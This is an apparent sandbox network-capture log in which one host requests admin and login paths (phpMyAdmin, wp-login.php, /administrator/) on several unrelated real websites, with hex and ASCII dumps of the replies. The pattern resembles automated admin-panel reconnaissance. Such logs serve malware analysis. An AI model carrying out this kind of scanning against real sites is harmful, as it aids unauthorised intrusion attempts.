2024-02-20 23:26:13 UTC	16318	IN	Data Raw: 33 46 42 36 0d 0a 66 66 22 20 69 64 3d 22 6c 69 73 74 66 69 6c 74 65 72 5f 70 72 69 63 65 74 6f 5f 31 39 22 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 78 73 2d 31 32 22 3e 0a 3c 73 74 72 6f 6e 67 3e 46 61 72 67 65 3c 2f 73 74 72 6f 6e 67 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 78 73 2d 31 32 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 2d 35 22 3e 0a 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 63 6c 61 73 73 3d 22 73 65 61 72 63 68 62 6f 78 5f 76 65 72 73 69 6f 6e 22 20 76 61 6c 75 65 3d 22 31 39 22 3e 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 63 6c 61 73 73 3d 22 66 69 6c 74 65 72 5f 63 6f 6c 6f 72 22 20 76 61 6c 75 65 3d 22 22 3e 3c 69 6e 70 75 74 20 Data Ascii: 3FB6ff" id="listfilter_priceto_19"></div><div class="col-xs-12"><strong>Farge</strong></div><div class="col-xs-12 margin-bottom-5"><input type="hidden" class="searchbox_version" value="19"><input type="hidden" class="filter_color" value=""><input
2024-02-20 23:26:13 UTC	11180	IN	Data Raw: 32 42 41 34 0d 0a 2f 6c 69 3e 0a 0a 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 2f 73 6f 72 74 69 6d 65 6e 74 2f 6d 65 72 6b 65 76 61 72 65 72 2f 62 61 62 79 62 75 67 7a 22 3e 42 61 62 79 42 75 67 7a 26 23 30 31 37 34 3b 3c 2f 61 3e 3c 2f 6c 69 3e 0a 0a 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 2f 73 6f 72 74 69 6d 65 6e 74 2f 6d 65 72 6b 65 76 61 72 65 72 2f 62 61 67 62 61 73 65 22 3e 42 61 67 42 61 73 65 26 23 30 31 37 34 3b 3c 2f 61 3e 3c 2f 6c 69 3e 0a 0a 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 2f 73 6f 72 74 69 6d 65 6e 74 2f 6d 65 72 6b 65 76 61 72 65 72 2f 62 65 65 63 68 66 69 65 6c 64 22 3e 42 65 65 63 68 66 69 65 6c 64 26 23 30 31 37 34 3b 3c 2f 61 3e 3c 2f 6c 69 3e 0a 0a 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 2f 73 6f 72 74 69 6d 65 6e 74 2f 6d 65 72 6b Data Ascii: 2BA4/li><li><a href="/sortiment/merkevarer/babybugz">BabyBugz®</a></li><li><a href="/sortiment/merkevarer/bagbase">BagBase®</a></li><li><a href="/sortiment/merkevarer/beechfield">Beechfield®</a></li><li><a href="/sortiment/merk
2024-02-20 23:26:13 UTC	3724	IN	Data Raw: 45 38 35 0d 0a 64 69 76 20 63 6c 61 73 73 3d 22 6d 6f 64 61 6c 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 6f 64 61 6c 2d 68 65 61 64 65 72 22 3e 0a 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 62 75 74 74 6f 6e 22 20 63 6c 61 73 73 3d 22 63 6c 6f 73 65 22 20 64 61 74 61 2d 64 69 73 6d 69 73 73 3d 22 6d 6f 64 61 6c 22 3e 3c 73 70 61 6e 20 61 72 69 61 2d 68 69 64 64 65 6e 3d 22 74 72 75 65 22 3e d7 3c 2f 73 70 61 6e 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 73 72 2d 6f 6e 6c 79 22 3e 43 6c 6f 73 65 3c 2f 73 70 61 6e 3e 3c 2f 62 75 74 74 6f 6e 3e 0a 3c 68 34 20 63 6c 61 73 73 3d 22 6d 6f 64 61 6c 2d 74 69 74 6c 65 22 20 69 64 3d 22 63 61 72 74 4c 69 73 74 4d 6f 64 61 6c 4c 61 62 65 6c 22 3e 48 61 6e 64 6c 65 6b 75 72 76 3c 2f 68 34 Data Ascii: E85div class="modal-content"><div class="modal-header"><button type="button" class="close" data-dismiss="modal"><span aria-hidden="true"></span><span class="sr-only">Close</span></button><h4 class="modal-title" id="cartListModalLabel">Handlekurv</h4
2024-02-20 23:26:13 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
144	192.168.2.6	61708	51.159.190.167	443

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:12 UTC	190	OUT	GET /administrator/index.php HTTP/1.1 Host: cabinet-orsika.fr Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-20 23:26:13 UTC	411	IN	HTTP/1.1 301 Moved Permanently Server: nginx Date: Tue, 20 Feb 2024 23:26:13 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: close X-Powered-By: PHP/8.1.27 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 X-Redirect-By: WordPress Location: https://www.cabinet-orsika.fr/administrator/ X-Cache-Status: MISS X-Powered-By: PleskLin

Session ID	Source IP	Source Port	Destination IP	Destination Port
145	192.168.2.6	61874	81.169.145.86	443

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:12 UTC	177	OUT	GET /phpmyadmin/ HTTP/1.1 Host: ksv-schwimmen.de Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-20 23:26:14 UTC	520	IN	HTTP/1.1 404 Not Found Date: Tue, 20 Feb 2024 23:26:13 GMT Server: Apache/2.4.58 (Unix) X-Powered-By: PHP/8.1.27 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <https://ksv-schwimmen.de/wp-json/>; rel="https://api.w.org/" X-TEC-API-VERSION: v1 X-TEC-API-ROOT: https://ksv-schwimmen.de/wp-json/tribe/events/v1/ X-TEC-API-ORIGIN: https://ksv-schwimmen.de Vary: User-Agent Content-Type: text/html; charset=UTF-8 Connection: close Transfer-Encoding: chunked
2024-02-20 23:26:14 UTC	7672	IN	Data Raw: 32 30 30 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 64 65 2d 44 45 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 20 0d 0a 09 20 3c 74 69 74 6c 65 3e 53 65 69 74 65 20 6e 69 63 68 74 20 67 65 66 75 6e 64 65 6e 20 26 23 38 32 31 31 3b 20 4b 53 56 20 4e 65 70 74 75 6e 20 31 38 38 39 Data Ascii: 2000<!DOCTYPE html><html lang="de-DE"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="profile" href="https://gmpg.org/xfn/11"> <title>Seite nicht gefunden – KSV Neptun 1889
2024-02-20 23:26:14 UTC	526	IN	Data Raw: 65 3d 22 72 61 64 69 6f 22 5d 3a 63 68 65 63 6b 65 64 2c 69 6e 70 75 74 5b 74 79 70 65 3d 72 65 73 65 74 5d 2c 69 6e 70 75 74 5b 74 79 70 65 3d 22 63 68 65 63 6b 62 6f 78 22 5d 3a 63 68 65 63 6b 65 64 2c 69 6e 70 75 74 5b 74 79 70 65 3d 22 63 68 65 63 6b 62 6f 78 22 5d 3a 68 6f 76 65 72 3a 63 68 65 63 6b 65 64 2c 69 6e 70 75 74 5b 74 79 70 65 3d 22 63 68 65 63 6b 62 6f 78 22 5d 3a 66 6f 63 75 73 3a 63 68 65 63 6b 65 64 2c 69 6e 70 75 74 5b 74 79 70 65 3d 72 61 6e 67 65 5d 3a 3a 2d 77 65 62 6b 69 74 2d 73 6c 69 64 65 72 2d 74 68 75 6d 62 7b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 61 73 74 2d 67 6c 6f 62 61 6c 2d 63 6f 6c 6f 72 2d 30 29 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 61 73 74 2d 67 6c 6f 62 61 6c 2d Data Ascii: e="radio"]:checked,input[type=reset],input[type="checkbox"]:checked,input[type="checkbox"]:hover:checked,input[type="checkbox"]:focus:checked,input[type=range]::-webkit-slider-thumb{border-color:var(--ast-global-color-0);background-color:var(--ast-global-
2024-02-20 23:26:14 UTC	2	IN	Data Raw: 0d 0a Data Ascii:
2024-02-20 23:26:14 UTC	8192	IN	Data Raw: 32 30 30 30 0d 0a 74 72 79 2d 6d 65 74 61 2c 2e 65 6e 74 72 79 2d 6d 65 74 61 20 2a 7b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 34 35 3b 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 61 73 74 2d 67 6c 6f 62 61 6c 2d 63 6f 6c 6f 72 2d 30 29 3b 7d 2e 65 6e 74 72 79 2d 6d 65 74 61 20 61 3a 6e 6f 74 28 2e 61 73 74 2d 62 75 74 74 6f 6e 29 3a 68 6f 76 65 72 2c 2e 65 6e 74 72 79 2d 6d 65 74 61 20 61 3a 6e 6f 74 28 2e 61 73 74 2d 62 75 74 74 6f 6e 29 3a 68 6f 76 65 72 20 2a 2c 2e 65 6e 74 72 79 2d 6d 65 74 61 20 61 3a 6e 6f 74 28 2e 61 73 74 2d 62 75 74 74 6f 6e 29 3a 66 6f 63 75 73 2c 2e 65 6e 74 72 79 2d 6d 65 74 61 20 61 3a 6e 6f 74 28 2e 61 73 74 2d 62 75 74 74 6f 6e 29 3a 66 6f 63 75 73 20 2a 2c 2e 70 61 67 65 2d 6c 69 6e 6b 73 20 3e 20 2e 70 61 67 65 2d 6c 69 6e 6b Data Ascii: 2000try-meta,.entry-meta {line-height:1.45;color:var(--ast-global-color-0);}.entry-meta a:not(.ast-button):hover,.entry-meta a:not(.ast-button):hover ,.entry-meta a:not(.ast-button):focus,.entry-meta a:not(.ast-button):focus *,.page-links > .page-link
2024-02-20 23:26:14 UTC	6	IN	Data Raw: 6c 69 6e 6b 2e 77 Data Ascii: link.w
2024-02-20 23:26:14 UTC	2	IN	Data Raw: 0d 0a Data Ascii:
2024-02-20 23:26:14 UTC	8192	IN	Data Raw: 32 30 30 30 0d 0a 70 2d 65 6c 65 6d 65 6e 74 2d 62 75 74 74 6f 6e 2c 2e 61 73 74 2d 6f 75 74 6c 69 6e 65 2d 62 75 74 74 6f 6e 7b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 69 6e 68 65 72 69 74 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 69 6e 68 65 72 69 74 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 65 6d 3b 62 6f 72 64 65 72 2d 74 6f 70 2d 6c 65 66 74 2d 72 61 64 69 75 73 3a 33 30 70 78 3b 62 6f 72 64 65 72 2d 74 6f 70 2d 72 69 67 68 74 2d 72 61 64 69 75 73 3a 33 30 70 78 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 2d 72 69 67 68 74 2d 72 61 64 69 75 73 3a 33 30 70 78 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 2d 6c 65 66 74 2d 72 61 64 69 75 73 3a 33 30 70 78 3b 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 62 75 74 74 Data Ascii: 2000p-element-button,.ast-outline-button{border-color:#000000;font-family:inherit;font-weight:inherit;line-height:1em;border-top-left-radius:30px;border-top-right-radius:30px;border-bottom-right-radius:30px;border-bottom-left-radius:30px;}.wp-block-butt
2024-02-20 23:26:14 UTC	6	IN	Data Raw: 78 3b 7d 7d 2e 61 Data Ascii: x;}}.a
2024-02-20 23:26:14 UTC	2	IN	Data Raw: 0d 0a Data Ascii:
2024-02-20 23:26:14 UTC	8192	IN	Data Raw: 32 30 30 30 0d 0a 73 74 2d 73 65 70 61 72 61 74 65 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 61 73 74 2d 67 6c 6f 62 61 6c 2d 63 6f 6c 6f 72 2d 35 29 3b 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 6e 6f 6e 65 3b 3b 7d 40 6d 65 64 69 61 20 28 6d 61 78 2d 77 69 64 74 68 3a 39 32 31 70 78 29 7b 2e 77 69 64 67 65 74 2d 74 69 74 6c 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 33 37 35 72 65 6d 3b 7d 62 6f 64 79 2c 62 75 74 74 6f 6e 2c 69 6e 70 75 74 2c 73 65 6c 65 63 74 2c 74 65 78 74 61 72 65 61 2c 2e 61 73 74 2d 62 75 74 74 6f 6e 2c 2e 61 73 74 2d 63 75 73 74 6f 6d 2d 62 75 74 74 6f 6e 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 66 6f 6e 74 2d Data Ascii: 2000st-separate-container{background-color:var(--ast-global-color-5);;background-image:none;;}@media (max-width:921px){.widget-title{font-size:22px;font-size:1.375rem;}body,button,input,select,textarea,.ast-button,.ast-custom-button{font-size:16px;font-

Session ID	Source IP	Source Port	Destination IP	Destination Port
146	192.168.2.6	61872	178.33.253.225	443

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:12 UTC	168	OUT	GET /phpMyAdmin/ HTTP/1.1 Host: cfca.eu Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-20 23:26:13 UTC	344	IN	HTTP/1.1 404 Not Found Server: nginx Date: Tue, 20 Feb 2024 23:26:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/8.2.15 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <https://cfca.eu/wp-json/>; rel="https://api.w.org/"
2024-02-20 23:26:13 UTC	16040	IN	Data Raw: 31 65 63 33 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 66 72 2d 46 52 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0a 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 6e 20 74 72 6f 75 76 c3 a9 65 20 26 23 38 32 31 31 3b 20 43 46 43 41 20 26 23 38 32 31 31 3b 20 43 61 62 69 6e 65 74 20 64 26 23 30 Data Ascii: 1ec3<!doctype html><html lang="fr-FR"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page non trouve – CFCA – Cabinet d&#0
2024-02-20 23:26:13 UTC	16384	IN	Data Raw: 75 67 69 6e 73 2f 65 6c 65 6d 65 6e 74 6f 72 2f 61 73 73 65 74 73 2f 6c 69 62 2f 65 69 63 6f 6e 73 2f 63 73 73 2f 65 6c 65 0d 0a 32 30 30 30 0d 0a 6d 65 6e 74 6f 72 2d 69 63 6f 6e 73 2e 6d 69 6e 2e 63 73 73 3f 76 65 72 3d 35 2e 32 37 2e 30 27 20 6d 65 64 69 61 3d 27 61 6c 6c 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 65 6c 65 6d 65 6e 74 6f 72 2d 66 72 6f 6e 74 65 6e 64 2d 63 73 73 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 66 63 61 2e 65 75 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 65 6c 65 6d 65 6e 74 6f 72 2f 61 73 73 65 74 73 2f 63 73 73 2f 66 72 6f 6e 74 65 6e 64 2e 6d 69 6e 2e 63 73 73 3f 76 65 72 3d 33 2e 31 39 2e 32 27 20 6d 65 64 69 61 3d 27 61 6c 6c 27 20 2f 3e 0a 3c Data Ascii: ugins/elementor/assets/lib/eicons/css/ele2000mentor-icons.min.css?ver=5.27.0' media='all' /><link rel='stylesheet' id='elementor-frontend-css' href='https://cfca.eu/wp-content/plugins/elementor/assets/css/frontend.min.css?ver=3.19.2' media='all' /><
2024-02-20 23:26:13 UTC	16384	IN	Data Raw: 63 65 20 7b 0a 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 52 61 6c 65 77 61 79 27 3b 0a 20 20 66 6f 6e 74 2d 73 74 79 6c 65 3a 20 69 74 61 6c 69 63 3b 0a 20 20 66 6f 0d 0a 31 30 30 30 0d 0a 6e 74 2d 77 65 69 67 68 74 3a 20 36 30 30 3b 0a 20 20 66 6f 6e 74 2d 64 69 73 70 6c 61 79 3a 20 73 77 61 70 3b 0a 20 20 73 72 63 3a 20 75 72 6c 28 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 73 2f 72 61 6c 65 77 61 79 2f 76 32 39 2f 31 50 74 73 67 38 7a 59 53 5f 53 4b 67 67 50 4e 79 43 67 34 51 49 46 71 50 66 45 2e 77 6f 66 66 32 29 20 66 6f 72 6d 61 74 28 27 77 6f 66 66 32 27 29 3b 0a 20 20 75 6e 69 63 6f 64 65 2d 72 61 6e 67 65 3a 20 55 2b 30 34 36 30 2d 30 35 32 46 2c 20 55 2b 31 43 38 30 2d 31 43 38 38 2c 20 55 2b 32 30 42 34 Data Ascii: ce { font-family: 'Raleway'; font-style: italic; fo1000nt-weight: 600; font-display: swap; src: url(https://fonts.gstatic.com/s/raleway/v29/1Ptsg8zYS_SKggPNyCg4QIFqPfE.woff2) format('woff2'); unicode-range: U+0460-052F, U+1C80-1C88, U+20B4
2024-02-20 23:26:13 UTC	14797	IN	Data Raw: 0a 7d 0a 2f 2a 20 63 79 72 69 6c 6c 69 63 20 2a 2f 0a 40 66 6f 6e 74 2d 66 61 63 65 20 7b 0a 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 52 61 6c 65 77 61 79 27 3b 0a 20 20 66 6f 6e 74 2d 73 74 79 6c 65 3a 20 6e 6f 72 6d 61 6c 3b 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 36 30 30 3b 0a 20 20 66 6f 6e 74 2d 64 69 73 70 6c 61 79 3a 20 73 77 61 70 3b 0a 20 20 73 72 63 3a 20 75 72 6c 28 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 73 2f 72 61 6c 65 77 61 79 2f 76 32 39 2f 31 50 74 75 67 38 7a 59 53 5f 53 4b 67 67 50 4e 79 43 6b 49 54 35 6c 75 2e 77 6f 66 66 32 29 20 66 6f 72 6d 61 74 28 27 77 6f 66 66 32 27 29 3b 0a 20 20 75 6e 69 63 6f 64 65 2d 72 61 6e 67 65 3a 20 55 2b 30 33 30 31 2c 20 55 2b 30 34 30 30 2d 30 34 Data Ascii: }/* cyrillic */@font-face { font-family: 'Raleway'; font-style: normal; font-weight: 600; font-display: swap; src: url(https://fonts.gstatic.com/s/raleway/v29/1Ptug8zYS_SKggPNyCkIT5lu.woff2) format('woff2'); unicode-range: U+0301, U+0400-04

Session ID	Source IP	Source Port	Destination IP	Destination Port
147	192.168.2.6	62345	104.21.54.169	443

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:12 UTC	185	OUT	GET /wp-login.php HTTP/1.1 Host: fortressrealcapital.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-20 23:26:13 UTC	806	IN	HTTP/1.1 200 OK Date: Tue, 20 Feb 2024 23:26:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 x-frame-options: SAMEORIGIN set-cookie: wordpress_test_cookie=WP%20Cookie%20check; path=/; secure vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=pD38EBZMn0b%2FlFVQAOlVsMHwm4Ps5qYx98QoBp6dsGNzoNVH0WxGO5wC06T7H5GVO5fwzA1jxcO1MXz5usctU%2Br%2FIamdlQphq%2FfCpcUijdEbhxKlDsw8eGt0RqiR1H2tkBl1grNdhqpmUA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 858a8363e8c5c331-EWR alt-svc: h3=":443"; ma=86400
2024-02-20 23:26:13 UTC	563	IN	Data Raw: 31 61 30 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 09 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 74 69 74 6c 65 3e 4c 6f 67 20 49 6e 20 26 6c 73 61 71 75 6f 3b 20 46 6f 72 74 72 65 73 73 20 52 65 61 6c 20 43 61 70 69 74 61 6c 20 26 23 38 32 31 32 3b 20 57 6f 72 64 50 72 65 73 73 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 Data Ascii: 1a04<!DOCTYPE html><html lang="en-US"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><title>Log In &lsaquo; Fortress Real Capital — WordPress</title><meta name='robots' content='noindex, follow' /><link rel='
2024-02-20 23:26:13 UTC	1369	IN	Data Raw: 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 66 6f 72 6d 73 2d 63 73 73 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 72 74 72 65 73 73 72 65 61 6c 63 61 70 69 74 61 6c 2e 63 6f 6d 2f 77 70 2d 61 64 6d 69 6e 2f 63 73 73 2f 66 6f 72 6d 73 2e 6d 69 6e 2e 63 73 73 3f 76 65 72 3d 36 2e 34 2e 33 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 20 6d 65 64 69 61 3d 27 61 6c 6c 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 6c 31 30 6e 2d 63 73 73 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 72 74 72 65 73 73 72 65 61 6c 63 61 70 69 74 61 6c 2e 63 6f 6d 2f 77 70 2d 61 64 6d 69 6e 2f 63 73 73 2f 6c 31 30 6e 2e 6d 69 6e 2e 63 73 73 3f 76 65 72 3d 36 2e 34 2e 33 27 20 74 79 70 65 3d 27 74 65 78 Data Ascii: stylesheet' id='forms-css' href='https://fortressrealcapital.com/wp-admin/css/forms.min.css?ver=6.4.3' type='text/css' media='all' /><link rel='stylesheet' id='l10n-css' href='https://fortressrealcapital.com/wp-admin/css/l10n.min.css?ver=6.4.3' type='tex
2024-02-20 23:26:13 UTC	1369	IN	Data Raw: 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 6f 72 64 70 72 65 73 73 2e 6f 72 67 2f 22 3e 50 6f 77 65 72 65 64 20 62 79 20 57 6f 72 64 50 72 65 73 73 3c 2f 61 3e 3c 2f 68 31 3e 0a 09 0a 09 09 3c 66 6f 72 6d 20 6e 61 6d 65 3d 22 6c 6f 67 69 6e 66 6f 72 6d 22 20 69 64 3d 22 6c 6f 67 69 6e 66 6f 72 6d 22 20 61 63 74 69 6f 6e 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 72 74 72 65 73 73 72 65 61 6c 63 61 70 69 74 61 6c 2e 63 6f 6d 2f 77 70 2d 6c 6f 67 69 6e 2e 70 68 70 22 20 6d 65 74 68 6f 64 3d 22 70 6f 73 74 22 3e 0a 09 09 09 3c 70 3e 0a 09 09 09 09 3c 6c 61 62 65 6c 20 66 6f 72 3d 22 75 73 65 72 5f 6c 6f 67 69 6e 22 3e 55 73 65 72 6e 61 6d 65 20 6f 72 20 45 6d 61 69 6c 20 41 64 64 72 65 73 73 3c 2f 6c 61 62 65 6c 3e 0a 09 09 09 09 3c 69 6e 70 75 74 20 74 79 70 65 Data Ascii: href="https://wordpress.org/">Powered by WordPress</a></h1><form name="loginform" id="loginform" action="https://fortressrealcapital.com/wp-login.php" method="post"><p><label for="user_login">Username or Email Address</label><input type
2024-02-20 23:26:13 UTC	1369	IN	Data Raw: 22 31 22 20 2f 3e 0a 09 09 09 3c 2f 70 3e 0a 09 09 3c 2f 66 6f 72 6d 3e 0a 0a 09 09 09 09 09 3c 70 20 69 64 3d 22 6e 61 76 22 3e 0a 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 77 70 2d 6c 6f 67 69 6e 2d 6c 6f 73 74 2d 70 61 73 73 77 6f 72 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 72 74 72 65 73 73 72 65 61 6c 63 61 70 69 74 61 6c 2e 63 6f 6d 2f 77 70 2d 6c 6f 67 69 6e 2e 70 68 70 3f 61 63 74 69 6f 6e 3d 6c 6f 73 74 70 61 73 73 77 6f 72 64 22 3e 4c 6f 73 74 20 79 6f 75 72 20 70 61 73 73 77 6f 72 64 3f 3c 2f 61 3e 09 09 09 3c 2f 70 3e 0a 09 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 2f 2a 20 3c 21 5b 43 44 41 54 41 5b 20 2a 2f 0a 66 75 6e 63 74 69 6f 6e 20 77 70 5f 61 74 74 65 6d 70 74 Data Ascii: "1" /></p></form><p id="nav"><a class="wp-login-lost-password" href="https://fortressrealcapital.com/wp-login.php?action=lostpassword">Lost your password?</a></p><script type="text/javascript">/* <![CDATA[ */function wp_attempt
2024-02-20 23:26:13 UTC	1369	IN	Data Raw: 31 2e 32 22 20 69 64 3d 22 77 70 2d 70 6f 6c 79 66 69 6c 6c 2d 69 6e 65 72 74 2d 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 72 74 72 65 73 73 72 65 61 6c 63 61 70 69 74 61 6c 2e 63 6f 6d 2f 77 70 2d 69 6e 63 6c 75 64 65 73 2f 6a 73 2f 64 69 73 74 2f 76 65 6e 64 6f 72 2f 72 65 67 65 6e 65 72 61 74 6f 72 2d 72 75 6e 74 69 6d 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 30 2e 31 34 2e 30 22 20 69 64 3d 22 72 65 67 65 6e 65 72 61 74 6f 72 2d 72 75 6e 74 69 6d 65 2d 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a Data Ascii: 1.2" id="wp-polyfill-inert-js"></script><script 